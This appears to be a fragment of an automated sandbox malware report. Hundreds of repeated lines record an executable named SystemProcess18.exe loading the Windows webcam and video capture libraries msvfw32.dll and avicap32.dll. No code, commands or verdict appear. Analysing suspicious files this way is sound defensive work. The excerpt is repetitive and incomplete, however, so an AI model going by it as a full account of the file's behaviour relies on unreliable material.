          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
